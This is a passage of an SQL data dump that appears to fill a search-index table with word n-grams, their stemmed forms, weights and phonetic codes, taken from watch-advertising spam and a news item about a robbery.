a',0,1,1.3,'L232',1,'en'),(39444,'lives','live',0,0,0.3333,'L120',1,'en'),(39445,'lives in','live in',0,1,1.2667,'L125',1,'en'),(39446,'lives in new','live in new',0,1,1.4,'L125',1,'en'),(39447,'look really','look really',0,1,1.3667,'L264',1,'en'),(39448,'look really stylish','look really stylish',0,1,1.6333,'L2642342',1,'en'),(39449,'lot of daring','lot of daring',0,1,1.4333,'L313652',1,'en'),(39450,'lots','lot',0,0,0.2667,'L320',1,'en'),(39451,'lots of','lot of',0,1,1.2333,'L321',1,'en'),(39452,'lots of watch','lot of watch',0,1,1.4333,'L32132',1,'en'),(39453,'mad','mad',0,0,0.2,'M300',1,'en'),(39454,'mad adult','mad adult',0,1,1.3,'M343',1,'en'),(39455,'mad adult adult','mad adult adult',0,1,1.5,'M34343',1,'en'),(39456,'major problem','major problem',0,1,1.4333,'M2616145',1,'en'),(39457,'major problem in','major problem in',0,1,1.5333,'M2616145',1,'en'),(39458,'males fad','male fad',0,1,1.3,'M4213',1,'en'),(39459,'males fad that','male fad that',0,1,1.4667,'M4213',1,'en'),(39460,'mall google','mall google',0,1,1.3667,'M424',1,'en'),(39461,'mall google deals','mall google deals',0,1,1.5667,'M424342',1,'en'),(39462,'manufacturers','manufactur',0,0,0.8667,'M12362',1,'en'),(39463,'manufacturers yet','manufactur yet',0,1,1.5667,'M123623',1,'en'),(39464,'manufacturers yet the','manufactur yet the',0,1,1.7,'M123623',1,'en'),(39465,'many with','mani with',0,1,1.3,'M300',1,'en'),(39466,'many with on','mani with on',0,1,1.4,'M350',1,'en'),(39467,'marvel','marvel',0,0,0.4,'M614',1,'en'),(39468,'marvel michael','marvel michael',0,1,1.4667,'M614524',1,'en'),(39469,'marvel michael kors','marvel michael kors',0,1,1.6333,'M614524262',1,'en'),(39470,'match','match',0,0,0.3333,'M320',1,'en'),(39471,'match white','match white',0,1,1.3667,'M323',1,'en'),(39472,'match white leading','match white leading',0,1,1.6333,'M3234352',1,'en'),(39473,'materials they','materi they',0,1,1.4667,'M36423',1,'en'),(39474,'materials they are','materi they are',0,1,1.6,'M364236',1,'en'),(39475,'matter of','matter of',0,1,1.3,'M361',1,'en'),(39476,'matter of purchasing','matter of purchasing',0,1,1.6667,'M3616252',1,'en'),(39477,'men include','men include',0,1,1.3667,'M243',1,'en'),(39478,'men include the','men include the',0,1,1.5,'M243',1,'en'),(39479,'mens watch','men watch',0,1,1.3333,'M232',1,'en'),(39480,'mens watch articles','men watch articles',0,1,1.6333,'M23263242',1,'en'),(39481,'michael kors','michael kors',0,1,1.4,'M24262',1,'en'),(39482,'michael kors bag','michael kors bag',0,1,1.5333,'M2426212',1,'en'),(39483,'michael kors goes','michael kors goes',0,1,1.5667,'M24262',1,'en'),(39484,'michael kors is','michael kors is',0,1,1.5,'M24262',1,'en'),(39485,'michael kors line','michael kors line',0,1,1.5667,'M2426245',1,'en'),(39486,'michael kors watches','michael kors watches',0,1,1.6667,'M2426232',1,'en'),(39487,'mine','mine',0,0,0.2667,'M000',1,'en'),(39488,'mine mall','mine mall',0,1,1.3,'M400',1,'en'),(39489,'mine mall google','mine mall google',0,1,1.5333,'M424',1,'en'),(39490,'money on a','monei on a',0,1,1.3333,'M000',1,'en'),(39491,'month michael','month michael',0,1,1.4333,'M3524',1,'en'),(39492,'month michael kors','month michael kors',0,1,1.6,'M3524262',1,'en'),(39493,'most picked','most picked',0,1,1.3667,'M23123',1,'en'),(39494,'most picked now','most picked now',0,1,1.5,'M231235',1,'en'),(39495,'names shapes','name shapes',0,1,1.4,'N212',1,'en'),(39496,'names shapes and','name shapes and',0,1,1.5333,'N21253',1,'en'),(39497,'new things','new things',0,1,1.3333,'N352',1,'en'),(39498,'new things to','new things to',0,1,1.4333,'N3523',1,'en'),(39499,'new york urban','new york urban',0,1,1.4667,'N62615',1,'en'),(39500,'night espirit','night espirit',0,1,1.4333,'N232163',1,'en'),(39501,'night espirit with','night espirit with',0,1,1.6,'N232163',1,'en'),(39502,'no marvel','no marvel',0,1,1.3,'N614',1,'en'),(39503,'no marvel michael','no marvel michael',0,1,1.5667,'N614524',1,'en'),(39504,'not intend','not intend',0,1,1.3333,'N35353',2,'en'),(39505,'not intend to','not intend to',0,1,1.4333,'N35353',2,'en'),(39506,'not last','not last',0,1,1.2667,'N3423',1,'en'),(39507,'not last after','not last after',0,1,1.4667,'N3423136',1,'en'),(39508,'now many','now many',0,1,1.2667,'N000',1,'en'),(39509,'now many with','now many with',0,1,1.4333,'N300',1,'en'),(39510,'of daring','of daring',0,1,1.3,'O13652',1,'en'),(39511,'of daring and','of daring and',0,1,1.4333,'O1365253',1,'en'),(39512,'of every','of every',0,1,1.2667,'O160',1,'en'),(39513,'of every lady\'s','of every lady',0,1,1.5,'O16432',1,'en'),(39514,'of michael','of michael',0,1,1.3333,'O1524',1,'en'),(39515,'of michael kors','of michael kors',0,1,1.5,'O1524262',1,'en'),(39516,'of mine','of mine',0,1,1.2333,'O150',1,'en'),(39517,'of mine mall','of mine mall',0,1,1.4,'O154',1,'en'),(39518,'of purchasing','of purchasing',0,1,1.4333,'O16252',1,'en'),(39519,'of purchasing high','of purchasing high',0,1,1.6,'O16252',1,'en'),(39520,'of purchasing quality','of purchasing quality',0,1,1.7,'O1625243',1,'en'),(39521,'of racing','of racing',0,1,1.3,'O16252',1,'en'),(39522,'of racing black','of racing black',0,1,1.5,'O16252142',1,'en'),(39523,'of the slim','of the slim',0,1,1.3667,'O13245',1,'en'),(39524,'of this line','of this line',0,1,1.4,'O13245',1,'en'),(39525,'of vogue','of vogue',0,1,1.2667,'O120',1,'en'),(39526,'of vogue jam','of vogue jam',0,1,1.4,'O125',1,'en'),(39527,'of watch','of watch',0,1,1.2667,'O132',1,'en'),(39528,'of watch dealers','of watch dealers',0,1,1.5333,'O1323462',1,'en'),(39529,'on a trend','on a trend',0,1,1.3333,'O53653',1,'en'),(39530,'on pandora','on pandora',0,1,1.3333,'O51536',1,'en'),(39531,'on pandora bracelets','on pandora bracelets',0,1,1.6667,'O51536162432',1,'en'),(39532,'only complement','onli complement',0,1,1.5,'O54251453',1,'en'),(39533,'only complement your','onli complement your',0,1,1.6667,'O542514536',1,'en'),(39534,'optimum','optimum',0,0,0.4667,'O135',1,'en'),(39535,'optimum of','optimum of',0,1,1.3333,'O1351',1,'en'),(39536,'optimum of every','optimum of every',0,1,1.5333,'O13516',1,'en'),(39537,'organizations are','organ are',0,1,1.5667,'O62523526',1,'en'),(39538,'organizations are most','organ are most',0,1,1.7333,'O62523526523',1,'en'),(39539,'outfit but','outfit but',0,1,1.3333,'O31313',1,'en'),(39540,'outfit but also','outfit but also',0,1,1.5,'O3131342',1,'en'),(39541,'overrun','overrun',0,0,0.4667,'O165',1,'en'),(39542,'overrun those','overrun those',0,1,1.4333,'O16532',1,'en'),(39543,'overrun those who','overrun those who',0,1,1.5667,'O16532',1,'en'),(39544,'parfum purely','parfum purely',0,1,1.4333,'P615164',1,'en'),(39545,'parfum purely exotic','parfum purely exotic',0,1,1.6667,'P615164232',1,'en'),(39546,'people who are','peopl who are',0,1,1.4667,'P460',1,'en'),(39547,'perhaps not last','perhap not last',0,1,1.5333,'P61253423',1,'en'),(39548,'picked now','pick now',0,1,1.3333,'P235',1,'en'),(39549,'picked now many','pick now many',0,1,1.5,'P235',1,'en'),(39550,'presently','present',0,0,0.6,'P62534',1,'en'),(39551,'presently lives','present lives',0,1,1.5,'P6253412',1,'en'),(39552,'presently lives in','present lives in',0,1,1.6,'P62534125',1,'en'),(39553,'pricey with','pricei with',0,1,1.3667,'P623',1,'en'),(39554,'pricey with the','pricei with the',0,1,1.5,'P623',1,'en'),(39555,'problem','problem',0,0,0.4667,'P6145',3,'en'),(39556,'problem in','problem in',0,1,1.3333,'P6145',1,'en'),(39557,'problem in the','problem in the',0,1,1.4667,'P61453',1,'en'),(39558,'produced by','produc by',0,1,1.3667,'P63231',1,'en'),(39559,'produced by recognized','produc by recognized',0,1,1.7333,'P6323162523',1,'en'),(39560,'provided birth','provid birth',0,1,1.4667,'P613163',1,'en'),(39561,'provided birth to','provid birth to',0,1,1.5667,'P613163',1,'en'),(39562,'purchasing high','purchas high',0,1,1.5,'P6252',1,'en'),(39563,'purchasing high sunglasses','purchas high sunglasses',0,1,1.8667,'P62525242',1,'en'),(39564,'purchasing quality','purchas quality',0,1,1.6,'P625243',1,'en'),(39565,'purchasing quality materials','purchas quality materials',0,1,1.9333,'P62524353642',1,'en'),(39566,'purely','pure',0,0,0.4,'P640',1,'en'),(39567,'purely exotic','pure exotic',0,1,1.4333,'P64232',1,'en'),(39568,'purely exotic the','pure exotic the',0,1,1.5667,'P642323',1,'en'),(39569,'quality materials','qualiti materials',0,1,1.5667,'Q4353642',1,'en'),(39570,'quality materials they','qualiti materials they',0,1,1.7333,'Q43536423',1,'en'),(39571,'quality watches','qualiti watches',0,1,1.5,'Q432',1,'en'),(39572,'quality watches you','qualiti watches you',0,1,1.6333,'Q432',1,'en'),(39573,'racing','race',0,0,0.4,'R252',1,'en'),(39574,'racing black','race black',0,1,1.4,'R252142',1,'en'),(39575,'racing black strap','race black strap',0,1,1.6,'R252142361',1,'en'),(39576,'really stylish','realli stylish',0,1,1.4667,'R42342',1,'en'),(39577,'really stylish and','realli stylish and',0,1,1.6,'R4234253',1,'en'),(39578,'recognized','recogn',0,0,0.6667,'R2523',1,'en'),(39579,'recognized manufacturers','recogn manufacturers',0,1,1.8,'R2523512362',1,'en'),(39580,'recognized manufacturers yet','recogn manufacturers yet',0,1,1.9333,'R25235123623',1,'en'),(39581,'represents the','repres the',0,1,1.4667,'R1625323',1,'en'),(39582,'represents the flamboyant','repres the flamboyant',0,1,1.8333,'R1625323145153',1,'en'),(39583,'retrograde','retrograd',0,0,0.6667,'R36263',1,'en'),(39584,'retrograde t2m422,.it','retrograd t2m422,.it',0,1,1.7,'R3626353',1,'en'),(39585,'retrograde t2m422,.it has','retrograd t2m422,.it has',0,1,1.8333,'R36263532',1,'en'),(39586,'risen','risen',0,0,0.3333,'R250',1,'en'),(39587,'risen in','risen in',0,1,1.2667,'R250',1,'en'),(39588,'risen in appeal','risen in appeal',0,1,1.5,'R2514',1,'en'),(39589,'secret','secret',0,0,0.4,'S630',1,'en'),(39590,'secret fixation','secret fixation',0,1,1.5,'S631235',1,'en'),(39591,'secret fixation from','secret fixation from',0,1,1.6667,'S631235165',1,'en'),(39592,'see in','see in',0,1,1.2,'S500',1,'en'),(39593,'see in the','see in the',0,1,1.3333,'S530',1,'en'),(39594,'seem forward','seem forward',0,1,1.4,'S5163',1,'en'),(39595,'seem forward to','seem forward to',0,1,1.5,'S5163',1,'en'),(39596,'service page','servic page',0,1,1.4,'S61212',1,'en'),(39597,'service page 1','servic page 1',0,1,1.4667,'S61212',1,'en'),(39598,'shapes','shape',0,0,0.4,'S120',1,'en'),(39599,'shapes and','shape and',0,1,1.3333,'S1253',1,'en'),(39600,'shapes and kinds','shape and kinds',0,1,1.5333,'S12532532',1,'en'),(39601,'shock solar','shock solar',0,1,1.3667,'S460',1,'en'),(39602,'shock solar 50','shock solar 50',0,1,1.4667,'S460',1,'en'),(39603,'single java','singl java',0,1,1.3667,'S52421',1,'en'),(39604,'single java want','singl java want',0,1,1.5333,'S5242153',1,'en'),(39605,'sixty\'s','sixti',0,0,0.4667,'S320',1,'en'),(39606,'sixty\'s skip','sixti skip',0,1,1.4,'S321',1,'en'),(39607,'sixty\'s skip donna','sixti skip donna',0,1,1.6,'S32135',1,'en'),(39608,'skinny','skinni',0,0,0.4,'S500',1,'en'),(39609,'skinny organizations','skinni organizations',0,1,1.6667,'S56252352',1,'en'),(39610,'skinny organizations are','skinni organizations are',0,1,1.8,'S562523526',1,'en'),(39611,'skip donna','skip donna',0,1,1.3333,'S135',1,'en'),(39612,'skip donna karan\'s','skip donna karan',0,1,1.6,'S1352652',1,'en'),(39613,'slim','slim',0,0,0.2667,'S450',1,'en'),(39614,'slim match','slim match',0,1,1.3333,'S4532',1,'en'),(39615,'slim match white','slim match white',0,1,1.5333,'S45323',1,'en'),(39616,'so aware','so aware',0,1,1.2667,'S600',1,'en'),(39617,'so aware about','so aware about',0,1,1.4667,'S613',1,'en'),(39618,'solar','solar',0,0,0.3333,'S460',1,'en'),(39619,'solar 50','solar 50',0,1,1.2667,'S460',1,'en'),(39620,'solar 50 lap','solar 50 lap',0,1,1.4,'S4641',1,'en'),(39621,'spent','spent',0,0,0.3333,'S153',1,'en'),(39622,'spent money','spent money',0,1,1.3667,'S1535',1,'en'),(39623,'spent money on','spent money on',0,1,1.4667,'S1535',1,'en'),(39624,'states stylist','state stylist',0,1,1.4667,'S323423',1,'en'),(39625,'states stylist and','state stylist and',0,1,1.6,'S32342353',1,'en'),(39626,'strap','strap',0,0,0.3333,'S361',1,'en'),(39627,'strap t2m552','strap t2m552',0,1,1.4,'S36135',1,'en'),(39628,'strap t2m552 gents','strap t2m552 gents',0,1,1.6,'S361352532',1,'en'),(39629,'stylish','stylish',0,0,0.4667,'S342',1,'en'),(39630,'stylish and','stylish and',0,1,1.3667,'S34253',1,'en'),(39631,'stylish and embellished','stylish and embellished',0,1,1.7667,'S3425351423',1,'en'),(39632,'stylist','stylist',0,0,0.4667,'S3423',1,'en'),(39633,'stylist and','stylist and',0,1,1.3667,'S342353',1,'en'),(39634,'stylist and presently','stylist and presently',0,1,1.7,'S342353162534',1,'en'),(39635,'sunglasses','sunglass',0,0,0.6667,'S5242',1,'en'),(39636,'sunglasses are','sunglass are',0,1,1.4667,'S52426',1,'en'),(39637,'sunglasses are and','sunglass are and',0,1,1.6,'S5242653',1,'en'),(39638,'supply the','suppli the',0,1,1.3333,'S143',1,'en'),(39639,'supply the best','suppli the best',0,1,1.5,'S143123',1,'en'),(39640,'t combination','t combination',0,1,1.4333,'T251535',1,'en'),(39641,'t combination of','t combination of',0,1,1.5333,'T2515351',1,'en'),(39642,'t2m422,.it','t2m422,.it',0,0,0.6667,'T530',1,'en'),(39643,'t2m422,.it has','t2m422,.it has',0,1,1.4667,'T532',1,'en'),(39644,'t2m422,.it has provided','t2m422,.it has provided',0,1,1.7667,'T5321613',1,'en'),(39645,'t2m552','t2m552',0,0,0.4,'T500',1,'en'),(39646,'t2m552 gents','t2m552 gents',0,1,1.4,'T52532',1,'en'),(39647,'t2m552 gents alligator','t2m552 gents alligator',0,1,1.7333,'T525324236',1,'en'),(39648,'t5j641','t5j641',0,0,0.4,'T200',1,'en'),(39649,'t5j641 t','t5j641 t',0,1,1.2667,'T230',1,'en'),(39650,'t5j641 t combination','t5j641 t combination',0,1,1.6667,'T23251535',1,'en'),(39651,'ten timex','ten timex',0,1,1.3,'T5352',1,'en'),(39652,'ten timex watches','ten timex watches',0,1,1.5667,'T535232',1,'en'),(39653,'tend to go','tend to go',0,1,1.3333,'T532',1,'en'),(39654,'that could','that could',0,1,1.3333,'T243',1,'en'),(39655,'that could perhaps','that could perhaps',0,1,1.6,'T2431612',1,'en'),(39656,'that has actually','that has actually',0,1,1.5667,'T234',1,'en'),(39657,'that there','that there',0,1,1.3333,'T600',1,'en'),(39658,'that there is','that there is',0,1,1.4333,'T620',1,'en'),(39659,'that they tend','that they tend',0,1,1.4667,'T530',1,'en'),(39660,'that this','that this',0,1,1.3,'T200',1,'en'),(39661,'that this is','that this is',0,1,1.4,'T200',1,'en'),(39662,'that we get','that we get',0,1,1.3667,'T230',1,'en'),(39663,'the a','the a',0,1,1.1667,'T000',1,'en'),(39664,'the a lot','the a lot',0,1,1.3,'T430',1,'en'),(39665,'the best watches','the best watches',0,1,1.5333,'T1232',1,'en'),(39666,'the exc','the exc',0,1,1.2333,'T200',1,'en'),(39667,'the flamboyant','the flamboyant',0,1,1.4667,'T145153',1,'en'),(39668,'the flamboyant facet','the flamboyant facet',0,1,1.6667,'T145153123',1,'en'),(39669,'the ironman','the ironman',0,1,1.3667,'T650',1,'en'),(39670,'the ironman shock','the ironman shock',0,1,1.5667,'T652',1,'en'),(39671,'the last','the last',0,1,1.2667,'T423',2,'en'),(39672,'the last twelve','the last twelve',0,1,1.5,'T42341',1,'en'),(39673,'the mad','the mad',0,1,1.2333,'T530',1,'en'),(39674,'the mad adult','the mad adult',0,1,1.4333,'T5343',1,'en'),(39675,'the major','the major',0,1,1.3,'T526',1,'en'),(39676,'the major problem','the major problem',0,1,1.5667,'T52616145',1,'en'),(39677,'the matter','the matter',0,1,1.3333,'T536',1,'en'),(39678,'the matter of','the matter of',0,1,1.4333,'T5361',1,'en'),(39679,'the slim','the slim',0,1,1.2667,'T245',1,'en'),(39680,'the slim match','the slim match',0,1,1.4667,'T24532',1,'en'),(39681,'the top ten','the top ten',0,1,1.3667,'T135',1,'en'),(39682,'the usage','the usage',0,1,1.3,'T200',1,'en'),(39683,'the usage quality','the usage quality',0,1,1.5667,'T243',1,'en'),(39684,'the world today','the world today',0,1,1.5,'T643',1,'en'),(39685,'their fashion','their fashion',0,1,1.4333,'T6125',1,'en'),(39686,'their fashion that','their fashion that',0,1,1.6,'T61253',1,'en'),(39687,'there are people','there are people',0,1,1.5333,'T614',1,'en'),(39688,'there is constantly','there is constantly',0,1,1.6333,'T62523534',1,'en'),(39689,'they are very','thei are very',0,1,1.4333,'T616',1,'en'),(39690,'they tend','thei tend',0,1,1.3,'T530',1,'en'),(39691,'they tend to','thei tend to',0,1,1.4,'T530',1,'en'),(39692,'thin','thin',0,0,0.2667,'T500',1,'en'),(39693,'thin the','thin the',0,1,1.2667,'T530',1,'en'),(39694,'thin the mad','thin the mad',0,1,1.4,'T5353',1,'en'),(39695,'things to seem','thing to seem',0,1,1.4667,'T52325',1,'en'),(39696,'this line','thi line',0,1,1.3,'T245',1,'en'),(39697,'this line and','thi line and',0,1,1.4333,'T2453',1,'en'),(39698,'those who fashion','those who fashion',0,1,1.5667,'T2125',1,'en'),(39699,'throughout the last','throughout the last',0,1,1.6333,'T623423',1,'en'),(39700,'timex','timex',0,0,0.3333,'T520',1,'en'),(39701,'timex watches','timex watches',0,1,1.4333,'T5232',1,'en'),(39702,'timex watches for','timex watches for',0,1,1.5667,'T523216',1,'en'),(39703,'to giorgio','to giorgio',0,1,1.3333,'T262',1,'en'),(39704,'to giorgio armani','to giorgio armani',0,1,1.5667,'T26265',1,'en'),(39705,'to go for','to go for',0,1,1.3,'T216',1,'en'),(39706,'to optimum','to optimum',0,1,1.3333,'T135',1,'en'),(39707,'to optimum of','to optimum of',0,1,1.4333,'T1351',1,'en'),(39708,'to see in','to see in',0,1,1.3,'T250',1,'en'),(39709,'to seem','to seem',0,1,1.2333,'T250',1,'en'),(39710,'to seem forward','to seem forward',0,1,1.5,'T25163',1,'en'),(39711,'to spent','to spent',0,1,1.2667,'T2153',1,'en'),(39712,'to spent money','to spent money',0,1,1.4667,'T21535',1,'en'),(39713,'to the a','to the a',0,1,1.2667,'T000',1,'en'),(39714,'to there','to there',0,1,1.2667,'T600',1,'en'),(39715,'to there are','to there are',0,1,1.4,'T600',1,'en'),(39716,'today it','todai it',0,1,1.2667,'T000',1,'en'),(39717,'today it represents','todai it represents',0,1,1.6333,'T6162532',1,'en'),(39718,'top ten','top ten',0,1,1.2333,'T135',1,'en'),(39719,'top ten timex','top ten timex',0,1,1.4333,'T135352',1,'en'),(39720,'trend that','trend that',0,1,1.3333,'T653',1,'en'),(39721,'trend that could','trend that could',0,1,1.5333,'T653243',1,'en'),(39722,'twelve','twelv',0,0,0.4,'T410',1,'en'),(39723,'twelve month','twelv month',0,1,1.4,'T4153',1,'en'),(39724,'twelve month michael','twelv month michael',0,1,1.6667,'T4153524',1,'en'),(39725,'united states stylist','unit states stylist',0,1,1.7,'U532323423',1,'en'),(39726,'urban cheap','urban cheap',0,1,1.3667,'U61521',1,'en'),(39727,'urban cheap pandora','urban cheap pandora',0,1,1.6333,'U61521536',1,'en'),(39728,'usage','usag',0,0,0.3333,'U200',1,'en'),(39729,'usage quality','usag quality',0,1,1.4333,'U243',1,'en'),(39730,'usage quality watches','usag quality watches',0,1,1.7,'U2432',1,'en'),(39731,'very fast','veri fast',0,1,1.3,'V6123',1,'en'),(39732,'very fast throughout','veri fast throughout',0,1,1.6667,'V6123623',1,'en'),(39733,'very pricey','veri pricey',0,1,1.3667,'V6162',1,'en'),(39734,'very pricey with','veri pricey with',0,1,1.5333,'V61623',1,'en'),(39735,'vibrant','vibrant',0,0,0.4667,'V653',1,'en'),(39736,'vibrant iteration','vibrant iteration',0,1,1.5667,'V653635',1,'en'),(39737,'vibrant iteration of','vibrant iteration of',0,1,1.6667,'V6536351',1,'en'),(39738,'vogue','vogu',0,0,0.3333,'V200',1,'en'),(39739,'vogue jam','vogu jam',0,1,1.3,'V250',1,'en'),(39740,'vogue jam kw','vogu jam kw',0,1,1.4,'V252',1,'en'),(39741,'want a','want a',0,1,1.2,'W530',1,'en'),(39742,'want a michael','want a michael',0,1,1.4667,'W53524',1,'en'),(39743,'watch','watch',0,0,0.3333,'W320',3,'en'),(39744,'watch articles','watch articles',0,1,1.4667,'W3263242',1,'en'),(39745,'watch articles armani','watch articles armani',0,1,1.7,'W326324265',1,'en'),(39746,'watch articles because','watch articles because',0,1,1.7333,'W326324212',1,'en'),(39747,'watch dealers','watch dealers',0,1,1.4333,'W323462',1,'en'),(39748,'watch dealers who','watch dealers who',0,1,1.5667,'W323462',1,'en'),(39749,'watch t5j641','watch t5j641',0,1,1.4,'W3232',1,'en'),(39750,'watch t5j641 t','watch t5j641 t',0,1,1.4667,'W32323',1,'en'),(39751,'watches','watch',0,0,0.4667,'W320',1,'en'),(39752,'watches for','watch for',0,1,1.3667,'W3216',1,'en'),(39753,'watches for men','watch for men',0,1,1.5,'W32165',1,'en'),(39754,'watches produced','watch produced',0,1,1.5333,'W3216323',1,'en'),(39755,'watches produced by','watch produced by',0,1,1.6333,'W32163231',1,'en'),(39756,'watches that','watch that',0,1,1.4,'W323',1,'en'),(39757,'watches that we','watch that we',0,1,1.5,'W323',1,'en'),(39758,'watches you','watch you',0,1,1.3667,'W320',1,'en'),(39759,'watches you won\'t','watch you won',0,1,1.5667,'W3253',1,'en'),(39760,'we get','we get',0,1,1.2,'W230',1,'en'),(39761,'we get to','we get to',0,1,1.3,'W230',1,'en'),(39762,'white leading','white leading',0,1,1.4333,'W34352',1,'en'),(39763,'white leading and','white leading and',0,1,1.5667,'W3435253',1,'en'),(39764,'who are so','who are so',0,1,1.3333,'W620',1,'en'),(39765,'who fashion','who fashion',0,1,1.3667,'W125',1,'en'),(39766,'who fashion company','who fashion company',0,1,1.6333,'W1252515',1,'en'),(39767,'who supply','who supply',0,1,1.3333,'W214',1,'en'),(39768,'who supply the','who supply the',0,1,1.4667,'W2143',1,'en'),(39769,'will look','will look',0,1,1.3,'W420',1,'en'),(39770,'will look really','will look really',0,1,1.5333,'W4264',1,'en'),(39771,'with joy','with joy',0,1,1.2667,'W320',1,'en'),(39772,'with joy estee','with joy estee',0,1,1.4667,'W323',1,'en'),(39773,'with on','with on',0,1,1.2333,'W350',1,'en'),(39774,'with on pandora','with on pandora',0,1,1.5,'W351536',1,'en'),(39775,'with the usage','with the usage',0,1,1.4667,'W320',1,'en'),(39776,'won\'t only','won only',0,1,1.3333,'W5354',1,'en'),(39777,'won\'t only complement','won only complement',0,1,1.7,'W5354251453',1,'en'),(39778,'wonderful night','wonder night',0,1,1.5,'W53614523',1,'en'),(39779,'wonderful night espirit','wonder night espirit',0,1,1.7667,'W536145232163',1,'en'),(39780,'world today','world today',0,1,1.3667,'W643',1,'en'),(39781,'world today it','world today it',0,1,1.4667,'W643',1,'en'),(39782,'yet the','yet the',0,1,1.2333,'Y300',1,'en'),(39783,'yet the major','yet the major',0,1,1.4333,'Y3526',1,'en'),(39784,'york urban','york urban',0,1,1.3333,'Y62615',1,'en'),(39785,'york urban cheap','york urban cheap',0,1,1.5333,'Y6261521',1,'en'),(39786,'you do','you do',0,1,1.2,'Y300',2,'en'),(39787,'you do not','you do not',0,1,1.3333,'Y353',1,'en'),(39788,'you will look','you will look',0,1,1.4333,'Y420',1,'en'),(39789,'you won\'t','you won',0,1,1.3,'Y530',1,'en'),(39790,'you won\'t only','you won only',0,1,1.4667,'Y5354',1,'en'),(39791,'your outfit but','your outfit but',0,1,1.5,'Y631313',1,'en'),(39792,'\'hey','hei',0,0,0.2667,'H000',1,'en'),(39793,'\'hey excuse','hei excuse',0,1,1.3667,'H200',1,'en'),(39794,'\'hey excuse me','hei excuse me',0,1,1.4667,'H250',1,'en'),(39795,'\'how','how',0,0,0.2667,'H000',1,'en'),(39796,'\'how else','how else',0,1,1.3,'H420',1,'en'),(39797,'\'how else am','how else am',0,1,1.4,'H425',1,'en'),(39798,'\'thank','thank',0,0,0.4,'T520',1,'en'),(39799,'\'thank you','thank you',0,1,1.3333,'T520',1,'en'),(39800,'\'thank you very','thank you very',0,1,1.5,'T5216',1,'en'),(39801,'1 105','1 105',0,1,1.1667,'',1,'en'),(39802,'1 105 pound','1 105 pound',0,1,1.3667,'P530',1,'en'),(39803,'10 carat','10 carat',0,1,1.2667,'C630',1,'en'),(39804,'10 carat gold','10 carat gold',0,1,1.4333,'C63243',1,'en'),(39805,'105','105',0,0,0.3,'',1,'en'),(39806,'105 pound','105 pound',0,1,1.3,'P530',1,'en'),(39807,'105 pound rich','105 pound rich',0,1,1.4667,'P5362',1,'en'),(39808,'11 cheap','11 cheap',0,1,1.2667,'C100',1,'en'),(39809,'11 cheap pandora','11 cheap pandora',0,1,1.5333,'C1536',1,'en'),(39810,'18 month','18 month',0,1,1.2667,'M300',1,'en'),(39811,'18 month probation','18 month probation',0,1,1.6,'M316135',1,'en'),(39812,'20 years','20 years',0,1,1.2667,'Y620',1,'en'),(39813,'20 years a','20 years a',0,1,1.3333,'Y620',1,'en'),(39814,'23','23',0,0,0.2,'',1,'en'),(39815,'23 credit','23 credit',0,1,1.3,'C630',1,'en'),(39816,'23 credit for','23 credit for',0,1,1.4333,'C6316',1,'en'),(39817,'23 described','23 described',0,1,1.4,'D2613',1,'en'),(39818,'23 described beckett','23 described beckett',0,1,1.6667,'D2613123',1,'en'),(39819,'24 inch','24 inch',0,1,1.2333,'I520',1,'en'),(39820,'24 inch 10','24 inch 10',0,1,1.3333,'I520',1,'en'),(39821,'26 days','26 days',0,1,1.2333,'D200',1,'en'),(39822,'26 days in','26 days in',0,1,1.3333,'D250',1,'en'),(39823,'5 foot','5 foot',0,1,1.2,'F300',1,'en'),(39824,'5 foot 1','5 foot 1',0,1,1.2667,'F300',1,'en'),(39825,'60 year','60 year',0,1,1.2333,'Y600',1,'en'),(39826,'60 year old','60 year old',0,1,1.3667,'Y643',1,'en'),(39827,'650.95','650.95',0,0,0.6,'',1,'en'),(39828,'650.95 when','650.95 when',0,1,1.3667,'W500',1,'en'),(39829,'650.95 when he','650.95 when he',0,1,1.4667,'W500',1,'en'),(39830,'76','76',0,0,0.2,'',1,'en'),(39831,'a 24','a 24',0,1,1.1333,'A000',1,'en'),(39832,'a 24 inch','a 24 inch',0,1,1.3,'A520',1,'en'),(39833,'a badly','a badly',0,1,1.2333,'A134',1,'en'),(39834,'a badly scraped','a badly scraped',0,1,1.5,'A1342613',1,'en'),(39835,'a big shame','a big shame',0,1,1.3667,'A125',1,'en'),(39836,'a break','a break',0,1,1.2333,'A162',2,'en'),(39837,'a break down','a break down',0,1,1.4,'A16235',1,'en'),(39838,'a downtown','a downtown',0,1,1.3333,'A3535',1,'en'),(39839,'a downtown jewelry','a downtown jewelry',0,1,1.6,'A3535246',1,'en'),(39840,'a extremely','a extremely',0,1,1.3667,'A23654',1,'en'),(39841,'a extremely serious','a extremely serious',0,1,1.6333,'A23654262',1,'en'),(39842,'a few credits','a few credits',0,1,1.4333,'A12632',1,'en'),(39843,'a few days','a few days',0,1,1.3333,'A132',2,'en'),(39844,'a five','a five',0,1,1.2,'A100',1,'en'),(39845,'a five year','a five year',0,1,1.3667,'A160',1,'en'),(39846,'a genetic','a genetic',0,1,1.3,'A2532',1,'en'),(39847,'a genetic sample','a genetic sample',0,1,1.5333,'A2532514',1,'en'),(39848,'a gold','a gold',0,1,1.2,'A243',1,'en'),(39849,'a gold chain','a gold chain',0,1,1.4,'A24325',1,'en'),(39850,'a hard','a hard',0,1,1.2,'A630',1,'en'),(39851,'a hard childhood','a hard childhood',0,1,1.5333,'A63243',1,'en'),(39852,'a joint','a joint',0,1,1.2333,'A253',1,'en'),(39853,'a joint submission','a joint submission',0,1,1.6,'A25321525',1,'en'),(39854,'a lot at','a lot at',0,1,1.2667,'A430',1,'en'),(39855,'a new 5','a new 5',0,1,1.2333,'A500',1,'en'),(39856,'a one armed','a one armed',0,1,1.3667,'A5653',1,'en'),(39857,'a problem','a problem',0,1,1.3,'A16145',1,'en'),(39858,'a problem with','a problem with',0,1,1.4667,'A161453',1,'en'),(39859,'a robbery','a robbery',0,1,1.3,'A616',1,'en'),(39860,'a robbery very','a robbery very',0,1,1.4667,'A61616',1,'en'),(39861,'a shop','a shop',0,1,1.2,'A210',1,'en'),(39862,'a shop assistant','a shop assistant',0,1,1.5333,'A212353',1,'en'),(39863,'a very good','a very good',0,1,1.3667,'A1623',1,'en'),(39864,'a worker','a worker',0,1,1.2667,'A626',1,'en'),(39865,'a worker cromarty','a worker cromarty',0,1,1.5667,'A62626563',1,'en'),(39866,'a year in','a year in',0,1,1.3,'A650',1,'en'),(39867,'abbott','abbott',0,0,0.4,'A130',1,'en'),(39868,'abbott called','abbott called',0,1,1.4333,'A13243',1,'en'),(39869,'abbott called the','abbott called the',0,1,1.5667,'A13243',1,'en'),(39870,'about 20','about 20',0,1,1.2667,'A130',1,'en'),(39871,'about 20 years','about 20 